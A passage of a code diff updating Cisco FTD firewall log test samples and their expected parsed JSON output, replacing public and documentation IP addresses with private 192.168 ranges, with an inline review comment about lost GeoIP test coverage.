0x0] +Apr 30 2013 09:22:40: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49738) -> outside/192.168.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0] +Apr 30 2013 09:22:41: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49746) -> outside/192.168.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0] +Apr 30 2013 09:22:47: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.16(2007) -> outside/192.168.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0] Apr 30 2013 09:22:48: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.13(43013) -> dmz/192.168.33.31(25) hit-cnt 1 first hit [0x71a87d94, 0x0] -Apr 30 2013 09:22:56: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.16(2008) -> outside/192.0.0.89(2000) hit-cnt 1 first hit 
[0x71a87d94, 0x0] -Apr 30 2013 09:23:02: %FTD-2-106006: Deny inbound UDP from 192.0.2.66/137 to 10.1.2.42/137 on interface inside -Apr 30 2013 09:23:03: %FTD-2-106007: Deny inbound UDP from 192.0.2.66/12981 to 10.1.5.60/53 due to DNS Query -Apr 30 2013 09:23:06: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.16(2009) -> outside/192.0.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0] -Apr 30 2013 09:23:08: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49776) -> outside/192.0.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0] -Apr 30 2013 09:23:15: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.16(2010) -> outside/192.0.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0] -Apr 30 2013 09:23:24: %FTD-5-106100: access-list acl_in denied tcp inside/10.0.0.16(2011) -> outside/192.0.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0] -Apr 30 2013 09:23:34: %FTD-5-106100: access-list acl_in denied tcp inside/10.0.0.16(2012) -> outside/192.0.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0] -Apr 30 2013 09:23:40: %FTD-4-106023: Deny tcp src outside:192.0.2.126/53638 dst inside:10.0.0.132/8111 by access-group "acl_out" [0x71761f18, 0x0] -Apr 30 2013 09:23:41: %FTD-4-106023: Deny tcp src outside:192.0.2.126/53638 dst inside:10.0.0.132/8111 by access-group "acl_out" [0x71761f18, 0x0] -Apr 30 2013 09:23:43: %FTD-5-106100: access-list acl_in est-allowed tcp inside/10.0.0.46(49840) -> outside/192.0.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0] -Apr 30 2013 09:23:43: %FTD-5-106100: access-list acl_in est-allowed tcp inside/10.0.0.16(2013) -> outside/192.0.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0] -Apr 15 2018 09:34:34 EDT: %FTD-session-5-106100: access-list acl_in permitted tcp inside/10.0.0.16(2241) -> outside/192.0.0.99(2000) hit-cnt 1 first hit [0x71a87d94, 0x0] +Apr 30 2013 09:22:56: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.16(2008) -> outside/192.168.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0] +Apr 30 
2013 09:23:02: %FTD-2-106006: Deny inbound UDP from 192.168.2.66/137 to 10.1.2.42/137 on interface inside +Apr 30 2013 09:23:03: %FTD-2-106007: Deny inbound UDP from 192.168.2.66/12981 to 10.1.5.60/53 due to DNS Query +Apr 30 2013 09:23:06: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.16(2009) -> outside/192.168.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0] +Apr 30 2013 09:23:08: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49776) -> outside/192.168.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0] +Apr 30 2013 09:23:15: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.16(2010) -> outside/192.168.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0] +Apr 30 2013 09:23:24: %FTD-5-106100: access-list acl_in denied tcp inside/10.0.0.16(2011) -> outside/192.168.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0] +Apr 30 2013 09:23:34: %FTD-5-106100: access-list acl_in denied tcp inside/10.0.0.16(2012) -> outside/192.168.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0] +Apr 30 2013 09:23:40: %FTD-4-106023: Deny tcp src outside:192.168.2.126/53638 dst inside:10.0.0.132/8111 by access-group "acl_out" [0x71761f18, 0x0] +Apr 30 2013 09:23:41: %FTD-4-106023: Deny tcp src outside:192.168.2.126/53638 dst inside:10.0.0.132/8111 by access-group "acl_out" [0x71761f18, 0x0] +Apr 30 2013 09:23:43: %FTD-5-106100: access-list acl_in est-allowed tcp inside/10.0.0.46(49840) -> outside/192.168.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0] +Apr 30 2013 09:23:43: %FTD-5-106100: access-list acl_in est-allowed tcp inside/10.0.0.16(2013) -> outside/192.168.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0] +Apr 15 2018 09:34:34 EDT: %FTD-session-5-106100: access-list acl_in permitted tcp inside/10.0.0.16(2241) -> outside/192.168.0.99(2000) hit-cnt 1 first hit [0x71a87d94, 0x0] Dec 11 2018 08:01:24 127.0.0.1: %FTD-6-302015: Built outbound UDP connection 447235 for outside:192.168.77.12/11180 (192.168.77.12/11180) to identity:10.0.13.13/80 
(10.0.13.13/80) -Dec 11 2018 08:01:24 127.0.0.1: %FTD-4-106023: Deny udp src dmz:192.168.1.33/5555 dst outside:192.0.0.12/53 by access-group "dmz" [0x123a465e, 0x4c7bf613] -Dec 11 2018 08:01:24 127.0.0.1: %FTD-4-106023: Deny udp src dmz:192.168.1.33/5555 dst outside:192.0.0.12/53 by access-group "dmz" [0x123a465e, 0x4c7bf613] -Dec 11 2018 08:01:31 127.0.0.1: %FTD-6-302013: Built outbound TCP connection 447236 for outside:192.0.2.222/1234 (192.0.2.222/1234) to dmz:OCSP_Server/5678 (OCSP_Server/5678) -Dec 11 2018 08:01:31 127.0.0.1: %FTD-6-302013: Built outbound TCP connection 447236 for outside:192.0.2.222/1234 (192.0.2.222/1234) to dmz:OCSP_Server/5678 (OCSP_Server/5678) -Dec 11 2018 08:01:31 127.0.0.1: %FTD-6-302014: Teardown TCP connection 447236 for outside:192.0.2.222/1234 to dmz:192.168.1.34/5678 duration 0:00:00 bytes 14804 TCP FINs -Dec 11 2018 08:01:38 127.0.0.1: %FTD-6-302014: Teardown TCP connection 447234 for outside:192.0.2.222/1234 to dmz:192.168.1.35/5678 duration 0:01:08 bytes 134781 TCP FINs -Dec 11 2018 08:01:38 127.0.0.1: %FTD-6-302014: Teardown TCP connection 447234 for outside:192.0.2.222/1234 to dmz:192.168.1.35/5678 duration 0:01:08 bytes 134781 TCP FINs -Dec 11 2018 08:01:38 127.0.0.1: %FTD-6-106015: Deny TCP (no connection) from 192.0.2.222/1234 to 192.168.1.34/5679 flags RST on interface outside -Dec 11 2018 08:01:38 127.0.0.1: %FTD-6-106015: Deny TCP (no connection) from 192.0.2.222/1234 to 192.168.1.34/5679 flags RST on interface outside -Dec 11 2018 08:01:39 127.0.0.1: %FTD-4-106023: Deny udp src dmz:192.168.1.34/5679 dst outside:192.0.0.12/5000 by access-group "dmz" [0x123a465e, 0x8c20f21] -Dec 11 2018 08:01:53 127.0.0.1: %FTD-6-302013: Built outbound TCP connection 447237 for outside:192.0.2.222/1234 (192.0.2.222/1234) to dmz:192.168.1.34/65000 (192.168.1.34/65000) -Dec 11 2018 08:01:53 127.0.0.1: %FTD-6-302013: Built outbound TCP connection 447237 for outside:192.0.2.222/1234 (192.0.2.222/1234) to dmz:192.168.1.34/65000 
(192.168.1.34/65000) -Dec 11 2018 08:01:53 127.0.0.1: %FTD-6-302014: Teardown TCP connection 447237 for outside:192.0.2.222/1234 to dmz:10.10.10.10/1235 duration 23:59:59 bytes 11420 TCP FINs +Dec 11 2018 08:01:24 127.0.0.1: %FTD-4-106023: Deny udp src dmz:192.168.1.33/5555 dst outside:192.168.0.12/53 by access-group "dmz" [0x123a465e, 0x4c7bf613] +Dec 11 2018 08:01:24 127.0.0.1: %FTD-4-106023: Deny udp src dmz:192.168.1.33/5555 dst outside:192.168.0.12/53 by access-group "dmz" [0x123a465e, 0x4c7bf613] +Dec 11 2018 08:01:31 127.0.0.1: %FTD-6-302013: Built outbound TCP connection 447236 for outside:192.168.2.222/1234 (192.168.2.222/1234) to dmz:OCSP_Server/5678 (OCSP_Server/5678) +Dec 11 2018 08:01:31 127.0.0.1: %FTD-6-302013: Built outbound TCP connection 447236 for outside:192.168.2.222/1234 (192.168.2.222/1234) to dmz:OCSP_Server/5678 (OCSP_Server/5678) +Dec 11 2018 08:01:31 127.0.0.1: %FTD-6-302014: Teardown TCP connection 447236 for outside:192.168.2.222/1234 to dmz:192.168.1.34/5678 duration 0:00:00 bytes 14804 TCP FINs +Dec 11 2018 08:01:38 127.0.0.1: %FTD-6-302014: Teardown TCP connection 447234 for outside:192.168.2.222/1234 to dmz:192.168.1.35/5678 duration 0:01:08 bytes 134781 TCP FINs +Dec 11 2018 08:01:38 127.0.0.1: %FTD-6-302014: Teardown TCP connection 447234 for outside:192.168.2.222/1234 to dmz:192.168.1.35/5678 duration 0:01:08 bytes 134781 TCP FINs +Dec 11 2018 08:01:38 127.0.0.1: %FTD-6-106015: Deny TCP (no connection) from 192.168.2.222/1234 to 192.168.1.34/5679 flags RST on interface outside +Dec 11 2018 08:01:38 127.0.0.1: %FTD-6-106015: Deny TCP (no connection) from 192.168.2.222/1234 to 192.168.1.34/5679 flags RST on interface outside +Dec 11 2018 08:01:39 127.0.0.1: %FTD-4-106023: Deny udp src dmz:192.168.1.34/5679 dst outside:192.168.0.12/5000 by access-group "dmz" [0x123a465e, 0x8c20f21] +Dec 11 2018 08:01:53 127.0.0.1: %FTD-6-302013: Built outbound TCP connection 447237 for outside:192.168.2.222/1234 (192.168.2.222/1234) to 
dmz:192.168.1.34/65000 (192.168.1.34/65000) +Dec 11 2018 08:01:53 127.0.0.1: %FTD-6-302013: Built outbound TCP connection 447237 for outside:192.168.2.222/1234 (192.168.2.222/1234) to dmz:192.168.1.34/65000 (192.168.1.34/65000) +Dec 11 2018 08:01:53 127.0.0.1: %FTD-6-302014: Teardown TCP connection 447237 for outside:192.168.2.222/1234 to dmz:10.10.10.10/1235 duration 23:59:59 bytes 11420 TCP FINs Aug 15 2012 23:30:09: %FTD-6-302016: Teardown UDP connection 40 for outside:10.44.4.4/500 to inside:10.44.2.2/500 duration 0:02:02 bytes 1416 -Sep 12 2014 06:50:53 GIFRCHN01 : %FTD-2-106016: Deny IP spoof from (0.0.0.0) to 192.88.99.47 on interface Mobile_Traffic -Sep 12 2014 06:51:01 GIFRCHN01 : %FTD-2-106016: Deny IP spoof from (0.0.0.0) to 192.88.99.57 on interface Mobile_Traffic -Sep 12 2014 06:51:05 GIFRCHN01 : %FTD-2-106016: Deny IP spoof from (0.0.0.0) to 192.88.99.47 on interface Mobile_Traffic -Sep 12 2014 06:51:05 GIFRCHN01 : %FTD-2-106016: Deny IP spoof from (0.0.0.0) to 192.88.99.47 on interface Mobile_Traffic -Sep 12 2014 06:51:06 GIFRCHN01 : %FTD-2-106016: Deny IP spoof from (0.0.0.0) to 192.88.99.57 on interface Mobile_Traffic -Sep 12 2014 06:51:17 GIFRCHN01 : %FTD-2-106016: Deny IP spoof from (0.0.0.0) to 192.88.99.57 on interface Mobile_Traffic +Sep 12 2014 06:50:53 GIFRCHN01 : %FTD-2-106016: Deny IP spoof from (0.0.0.0) to 192.168.99.47 on interface Mobile_Traffic +Sep 12 2014 06:51:01 GIFRCHN01 : %FTD-2-106016: Deny IP spoof from (0.0.0.0) to 192.168.99.57 on interface Mobile_Traffic +Sep 12 2014 06:51:05 GIFRCHN01 : %FTD-2-106016: Deny IP spoof from (0.0.0.0) to 192.168.99.47 on interface Mobile_Traffic +Sep 12 2014 06:51:05 GIFRCHN01 : %FTD-2-106016: Deny IP spoof from (0.0.0.0) to 192.168.99.47 on interface Mobile_Traffic +Sep 12 2014 06:51:06 GIFRCHN01 : %FTD-2-106016: Deny IP spoof from (0.0.0.0) to 192.168.99.57 on interface Mobile_Traffic +Sep 12 2014 06:51:17 GIFRCHN01 : %FTD-2-106016: Deny IP spoof from (0.0.0.0) to 192.168.99.57 on interface 
Mobile_Traffic Sep 12 2014 06:52:48 GIFRCHN01 : %FTD-2-106016: Deny IP spoof from (0.0.0.0) to 192.168.1.255 on interface Mobile_Traffic Sep 12 2014 06:53:00 GIFRCHN01 : %FTD-2-106016: Deny IP spoof from (0.0.0.0) to 192.168.1.255 on interface Mobile_Traffic -Sep 12 2014 06:53:01 GIFRCHN01 : %FTD-4-106023: Deny tcp src outside:192.0.2.95/24069 dst inside:10.32.112.125/25 by access-group "PERMIT_IN" [0x0, 0x0]" +Sep 12 2014 06:53:01 GIFRCHN01 : %FTD-4-106023: Deny tcp src outside:192.168.2.95/24069 dst inside:10.32.112.125/25 by access-group "PERMIT_IN" [0x0, 0x0]" Sep 12 2014 06:53:02 GIFRCHN01 : %FTD-3-313001: Denied ICMP type=3, code=3 from 10.2.3.5 on interface Outside Jan 14 2015 13:16:13: %FTD-4-313004: Denied ICMP type=0, from laddr 172.16.30.2 on interface inside to 172.16.1.10: no matching session -Jan 14 2015 13:16:14: %FTD-4-338002: Dynamic Filter permitted black listed TCP traffic from inside:10.1.1.45/6798 (192.88.99.1/7890) to outside:192.88.99.129/80 (192.88.99.129/80), destination 192.88.99.129 resolved from dynamic list: bad.example.com -Jan 14 2015 13:16:14: %FTD-4-338004: Dynamic Filter monitored blacklisted TCP traffic from inside:10.1.1.1/33340 (10.2.1.1/33340) to outsidet:192.0.2.223/80 (192.0.2.225/80), destination 192.0.2.223 resolved from dynamic list: 192.0.2.223/255.255.255.255, threat-level: very-high, category: Malware -Jan 14 2015 13:16:14: %FTD-4-338008: Dynamic Filter dropped blacklisted TCP traffic from inside:10.1.1.1/33340 (10.2.1.1/33340) to outsidet:192.0.2.223/80 (192.0.2.223/8080), destination 192.0.2.223 resolved from dynamic list: 192.0.2.223/255.255.255.255, threat-level: very-high, category: Malware -Nov 16 2009 14:12:35: %FTD-5-304001: 10.30.30.30 Accessed URL 192.0.2.1:/app -Nov 16 2009 14:12:36: %FTD-5-304001: 10.5.111.32 Accessed URL 192.0.2.32:http://example.com -Nov 16 2009 14:12:37: %FTD-5-304002: Access denied URL http://www.example.net/images/favicon.ico SRC 10.69.6.39 DEST 192.0.0.19 on interface inside +Jan 14 
2015 13:16:14: %FTD-4-338002: Dynamic Filter permitted black listed TCP traffic from inside:10.1.1.45/6798 (192.168.99.1/7890) to outside:192.168.99.129/80 (192.168.99.129/80), destination 192.168.99.129 resolved from dynamic list: bad.example.com +Jan 14 2015 13:16:14: %FTD-4-338004: Dynamic Filter monitored blacklisted TCP traffic from inside:10.1.1.1/33340 (10.2.1.1/33340) to outsidet:192.168.2.223/80 (192.168.2.225/80), destination 192.168.2.223 resolved from dynamic list: 192.168.2.223/255.255.255.255, threat-level: very-high, category: Malware +Jan 14 2015 13:16:14: %FTD-4-338008: Dynamic Filter dropped blacklisted TCP traffic from inside:10.1.1.1/33340 (10.2.1.1/33340) to outsidet:192.168.2.223/80 (192.168.2.223/8080), destination 192.168.2.223 resolved from dynamic list: 192.168.2.223/255.255.255.255, threat-level: very-high, category: Malware +Nov 16 2009 14:12:35: %FTD-5-304001: 10.30.30.30 Accessed URL 192.168.2.1:/app +Nov 16 2009 14:12:36: %FTD-5-304001: 10.5.111.32 Accessed URL 192.168.2.32:http://example.com +Nov 16 2009 14:12:37: %FTD-5-304002: Access denied URL http://www.example.net/images/favicon.ico SRC 10.69.6.39 DEST 192.168.0.19 on interface inside diff --git a/packages/cisco/data_stream/ftd/_dev/test/pipeline/test-sample.log-expected.json b/packages/cisco/data_stream/ftd/_dev/test/pipeline/test-sample.log-expected.json index 4c62577d4d2..7fda427d8c5 100644 --- a/packages/cisco/data_stream/ftd/_dev/test/pipeline/test-sample.log-expected.json +++ b/packages/cisco/data_stream/ftd/_dev/test/pipeline/test-sample.log-expected.json @@ -6,8 +6,8 @@ }, "destination": { "port": 53, - "address": "192.0.0.8", - "ip": "192.0.0.8" + "address": "192.168.0.8", + "ip": "192.168.0.8" }, "source": { "port": 63016, 
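Review bot: Every public-looking address in this fixture is now RFC 1918: `192.0.0.x` (IETF protocol assignments), `192.0.2.x` (TEST-NET-1) and `192.88.99.x` (the retired 6to4 anycast prefix) are all folded into `192.168.x.x`, so the `outside:` side of every connection, the `Deny IP spoof ... to 192.168.99.47` lines and the `destination 192.168.2.223 resolved from dynamic list` threat-intel lines now carry private destinations. If the pipeline skips geo/ASN enrichment for private ranges (the usual behaviour, and presumably the motivation for the change), this sample no longer exercises that enrichment or any public/private distinction for the FTD pipeline at all; keeping one or two lines on a supported public address, e.g. the `81.2.69.144` this same change uses in test-not-ip.log, would retain that coverage. The rewrite also yields a NAT translation from `inside:192.168.3.42` to `outside:192.168.0.130` and blacklisted traffic from `outside:192.168.2.222` into `dmz:192.168.1.34`, a topology that will confuse anyone reading the sample as documentation, so a one-line README next to the fixture stating that addresses were chosen for the test GeoIP database rather than realism would help.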
@@ -43,13 +43,13 @@ "related": { "ip": [ "10.1.2.30", - "192.0.0.8" + "192.168.0.8" ] }, "event": { "severity": 4, - "ingested": "2021-07-19T09:06:48.994086451Z", - "original": "Apr 15 2013 09:36:50: %FTD-4-106023: Deny tcp src dmz:10.1.2.30/63016 dst outside:192.0.0.8/53 by access-group \"acl_dmz\" [0xe3aab522, 0x0]", + "ingested": "2021-12-09T13:33:04.305642200Z", + "original": "Apr 15 2013 09:36:50: %FTD-4-106023: Deny tcp src dmz:10.1.2.30/63016 dst outside:192.168.0.8/53 by access-group \"acl_dmz\" [0xe3aab522, 0x0]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -76,8 +76,8 @@ }, "destination": { "port": 53, - "address": "192.0.0.8", - "ip": "192.0.0.8" + "address": "192.168.0.8", + "ip": "192.168.0.8" }, "source": { "port": 63016, @@ -113,13 +113,13 @@ "related": { "ip": [ "10.1.2.30", - "192.0.0.8" + "192.168.0.8" ] }, "event": { "severity": 4, - "ingested": "2021-07-19T09:06:48.994092726Z", - "original": "Apr 15 2013 09:36:50: %FTD-4-106023: Deny tcp src dmz:10.1.2.30/63016 dst outside:192.0.0.8/53 type 3, code 0, by access-group \"acl_dmz\" [0xe3aab522, 0x0]", + "ingested": "2021-12-09T13:33:04.305651100Z", + "original": "Apr 15 2013 09:36:50: %FTD-4-106023: Deny tcp src dmz:10.1.2.30/63016 dst outside:192.168.0.8/53 type 3, code 0, by access-group \"acl_dmz\" [0xe3aab522, 0x0]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -146,8 +146,8 @@ }, "destination": { "port": 2000, - "address": "192.0.0.89", - "ip": "192.0.0.89" + "address": "192.168.0.89", + "ip": "192.168.0.89" }, "source": { "port": 2241, 
@@ -183,13 +183,13 @@ "related": { "ip": [ "10.1.2.16", - "192.0.0.89" + "192.168.0.89" ] }, "event": { "severity": 5, - "ingested": "2021-07-19T09:06:48.994094922Z", - "original": "Apr 15 2014 09:34:34 EDT: %FTD-session-5-106100: access-list acl_in permitted tcp inside/10.1.2.16(2241) -\u003e outside/192.0.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]", + "ingested": "2021-12-09T13:33:04.305656700Z", + "original": "Apr 15 2014 09:34:34 EDT: %FTD-session-5-106100: access-list acl_in permitted tcp inside/10.1.2.16(2241) -\u003e outside/192.168.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", "action": "firewall-rule", @@ -217,8 +217,8 @@ }, "destination": { "port": 53, - "address": "192.0.2.10", - "ip": "192.0.2.10" + "address": "192.168.2.10", + "ip": "192.168.2.10" }, "source": { "port": 1039, @@ -258,7 +258,7 @@ ], "ip": [ "172.29.2.101", - "192.0.2.10" + "192.168.2.10" ] }, "host": { @@ -266,8 +266,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:48.994096834Z", - "original": "Apr 24 2013 16:00:28 INT-FW01 : %FTD-6-106100: access-list inside denied udp inside/172.29.2.101(1039) -\u003e outside/192.0.2.10(53) hit-cnt 1 first hit [0xd820e56a, 0x0]", + "ingested": "2021-12-09T13:33:04.305662Z", + "original": "Apr 24 2013 16:00:28 INT-FW01 : %FTD-6-106100: access-list inside denied udp inside/172.29.2.101(1039) -\u003e outside/192.168.2.10(53) hit-cnt 1 first hit [0xd820e56a, 0x0]", "code": "106100", "kind": "event", "action": "firewall-rule", @@ -294,8 +294,8 @@ }, "destination": { "port": 53, - "address": "192.0.2.57", - "ip": "192.0.2.57" + "address": "192.168.2.57", + "ip": "192.168.2.57" }, "source": { "port": 1065, @@ -335,7 +335,7 @@ ], "ip": [ "172.29.2.3", - "192.0.2.57" + "192.168.2.57" ] }, "host": { 
@@ -343,8 +343,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:48.994098624Z", - "original": "Apr 24 2013 16:00:27 INT-FW01 : %FTD-6-106100: access-list inside permitted udp inside/172.29.2.3(1065) -\u003e outside/192.0.2.57(53) hit-cnt 144 300-second interval [0xe982c7a4, 0x0]", + "ingested": "2021-12-09T13:33:04.305667500Z", + "original": "Apr 24 2013 16:00:27 INT-FW01 : %FTD-6-106100: access-list inside permitted udp inside/172.29.2.3(1065) -\u003e outside/192.168.2.57(53) hit-cnt 144 300-second interval [0xe982c7a4, 0x0]", "code": "106100", "kind": "event", "action": "firewall-rule", @@ -371,8 +371,8 @@ }, "destination": { "port": 12834, - "address": "192.0.2.130", - "ip": "192.0.2.130" + "address": "192.168.2.130", + "ip": "192.168.2.130" }, "source": { "port": 4952, @@ -408,13 +408,13 @@ "related": { "ip": [ "10.123.3.42", - "192.0.2.130" + "192.168.2.130" ] }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:48.994100450Z", - "original": "Apr 29 2013 12:59:50: %FTD-6-305011: Built dynamic TCP translation from outside:10.123.3.42/4952 to outside:192.0.2.130/12834", + "ingested": "2021-12-09T13:33:04.305672900Z", + "original": "Apr 29 2013 12:59:50: %FTD-6-305011: Built dynamic TCP translation from outside:10.123.3.42/4952 to outside:192.168.2.130/12834", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -446,8 +446,8 @@ }, "source": { "port": 443, - "address": "192.0.2.43", - "ip": "192.0.2.43" + "address": "192.168.2.43", + "ip": "192.168.2.43" }, "tags": [ "preserve_original_event" 
@@ -478,14 +478,14 @@ }, "related": { "ip": [ - "192.0.2.43", + "192.168.2.43", "10.123.3.42" ] }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:48.994102296Z", - "original": "Apr 29 2013 12:59:50: %FTD-6-302013: Built outbound TCP connection 89743274 for outside:192.0.2.43/443 (192.0.2.43/443) to outside:10.123.3.42/4952 (10.123.3.42/12834)", + "ingested": "2021-12-09T13:33:04.305678200Z", + "original": "Apr 29 2013 12:59:50: %FTD-6-302013: Built outbound TCP connection 89743274 for outside:192.168.2.43/443 (192.168.2.43/443) to outside:10.123.3.42/4952 (10.123.3.42/12834)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -501,7 +501,7 @@ "destination_interface": "outside", "mapped_source_port": 443, "mapped_destination_ip": "10.123.3.42", - "mapped_source_ip": "192.0.2.43", + "mapped_source_ip": "192.168.2.43", "connection_id": "89743274", "source_interface": "outside", "mapped_destination_port": 12834 @@ -514,8 +514,8 @@ }, "destination": { "port": 25882, - "address": "192.0.2.130", - "ip": "192.0.2.130" + "address": "192.168.2.130", + "ip": "192.168.2.130" }, "source": { "port": 52925, @@ -551,13 +551,13 @@ "related": { "ip": [ "10.123.1.35", - "192.0.2.130" + "192.168.2.130" ] }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:48.994104178Z", - "original": "Apr 29 2013 12:59:50: %FTD-6-305011: Built dynamic UDP translation from outside:10.123.1.35/52925 to outside:192.0.2.130/25882", + "ingested": "2021-12-09T13:33:04.305683500Z", + "original": "Apr 29 2013 12:59:50: %FTD-6-305011: Built dynamic UDP translation from outside:10.123.1.35/52925 to outside:192.168.2.130/25882", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -589,11 +589,11 @@ }, "source": { "nat": { - "ip": "192.0.2.43" + "ip": "192.168.2.43" }, - "address": "192.0.2.222", + "address": "192.168.2.222", "port": 53, - "ip": "192.0.2.222" + "ip": "192.168.2.222" }, "tags": [ "preserve_original_event" 
@@ -624,15 +624,15 @@ }, "related": { "ip": [ - "192.0.2.222", - "192.0.2.43", + "192.168.2.222", + "192.168.2.43", "10.123.1.35" ] }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:48.994106029Z", - "original": "Apr 29 2013 12:59:50: %FTD-6-302015: Built outbound UDP connection 89743275 for outside:192.0.2.222/53 (192.0.2.43/53) to outside:10.123.1.35/52925 (10.123.1.35/25882)", + "ingested": "2021-12-09T13:33:04.305688800Z", + "original": "Apr 29 2013 12:59:50: %FTD-6-302015: Built outbound UDP connection 89743275 for outside:192.168.2.222/53 (192.168.2.43/53) to outside:10.123.1.35/52925 (10.123.1.35/25882)", "code": "302015", "kind": "event", "action": "firewall-rule", @@ -648,7 +648,7 @@ "destination_interface": "outside", "mapped_source_port": 53, "mapped_destination_ip": "10.123.1.35", - "mapped_source_ip": "192.0.2.43", + "mapped_source_ip": "192.168.2.43", "connection_id": "89743275", "source_interface": "outside", "mapped_destination_port": 25882 @@ -661,8 +661,8 @@ }, "destination": { "port": 45392, - "address": "192.0.2.130", - "ip": "192.0.2.130" + "address": "192.168.2.130", + "ip": "192.168.2.130" }, "source": { "port": 4953, @@ -698,13 +698,13 @@ "related": { "ip": [ "10.123.3.42", - "192.0.2.130" + "192.168.2.130" ] }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:48.994107813Z", - "original": "Apr 29 2013 12:59:50: %FTD-6-305011: Built dynamic TCP translation from outside:10.123.3.42/4953 to outside:192.0.2.130/45392", + "ingested": "2021-12-09T13:33:04.305694200Z", + "original": "Apr 29 2013 12:59:50: %FTD-6-305011: Built dynamic TCP translation from outside:10.123.3.42/4953 to outside:192.168.2.130/45392", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -737,8 +737,8 @@ }, "source": { "port": 80, - "address": "192.0.2.1", - "ip": "192.0.2.1" + "address": "192.168.2.1", + "ip": "192.168.2.1" }, "tags": [ "preserve_original_event" 
@@ -769,15 +769,15 @@ }, "related": { "ip": [ - "192.0.2.1", + "192.168.2.1", "10.123.3.42", "10.123.3.130" ] }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:48.994109640Z", - "original": "Apr 29 2013 12:59:50: %FTD-6-302013: Built outbound TCP connection 89743276 for outside:192.0.2.1/80 (192.0.2.1/80) to outside:10.123.3.42/4953 (10.123.3.130/45392)", + "ingested": "2021-12-09T13:33:04.305699600Z", + "original": "Apr 29 2013 12:59:50: %FTD-6-302013: Built outbound TCP connection 89743276 for outside:192.168.2.1/80 (192.168.2.1/80) to outside:10.123.3.42/4953 (10.123.3.130/45392)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -793,7 +793,7 @@ "destination_interface": "outside", "mapped_source_port": 80, "mapped_destination_ip": "10.123.3.130", - "mapped_source_ip": "192.0.2.1", + "mapped_source_ip": "192.168.2.1", "connection_id": "89743276", "source_interface": "outside", "mapped_destination_port": 45392 @@ -811,8 +811,8 @@ }, "source": { "port": 53, - "address": "192.0.2.222", - "ip": "192.0.2.222" + "address": "192.168.2.222", + "ip": "192.168.2.222" }, "tags": [ "preserve_original_event" @@ -843,15 +843,15 @@ }, "related": { "ip": [ - "192.0.2.222", + "192.168.2.222", "10.123.1.35" ] }, "event": { "severity": 6, "duration": 5025000000000, - "ingested": "2021-07-19T09:06:48.994111745Z", - "original": "Apr 29 2013 12:59:50: %FTD-6-302016: Teardown UDP connection 89743275 for outside:192.0.2.222/53 to inside:10.123.1.35/52925 duration 1:23:45 bytes 140", + "ingested": "2021-12-09T13:33:04.305705400Z", + "original": "Apr 29 2013 12:59:50: %FTD-6-302016: Teardown UDP connection 89743275 for outside:192.168.2.222/53 to inside:10.123.1.35/52925 duration 1:23:45 bytes 140", "code": "302016", "kind": "event", "start": "2013-04-29T11:36:05.000Z", @@ -884,8 +884,8 @@ }, "source": { "port": 53, - "address": "192.0.2.222", - "ip": "192.0.2.222" + "address": "192.168.2.222", + "ip": "192.168.2.222" }, "tags": [ "preserve_original_event" 
@@ -916,15 +916,15 @@ }, "related": { "ip": [ - "192.0.2.222", + "192.168.2.222", "10.123.1.35" ] }, "event": { "severity": 6, "duration": 36000000000000, - "ingested": "2021-07-19T09:06:48.994113602Z", - "original": "Apr 29 2013 12:59:50: %FTD-6-302016: Teardown UDP connection 666 for outside:192.0.2.222/53 user1 to inside:10.123.1.35/52925 user2 duration 10:00:00 bytes 9999999", + "ingested": "2021-12-09T13:33:04.305710800Z", + "original": "Apr 29 2013 12:59:50: %FTD-6-302016: Teardown UDP connection 666 for outside:192.168.2.222/53 user1 to inside:10.123.1.35/52925 user2 duration 10:00:00 bytes 9999999", "code": "302016", "kind": "event", "start": "2013-04-29T02:59:50.000Z", @@ -991,7 +991,7 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:48.994115397Z", + "ingested": "2021-12-09T13:33:04.305716100Z", "original": "Jun 04 2011 21:59:52 FJSG2NRFW01 : %FTD-6-302021: 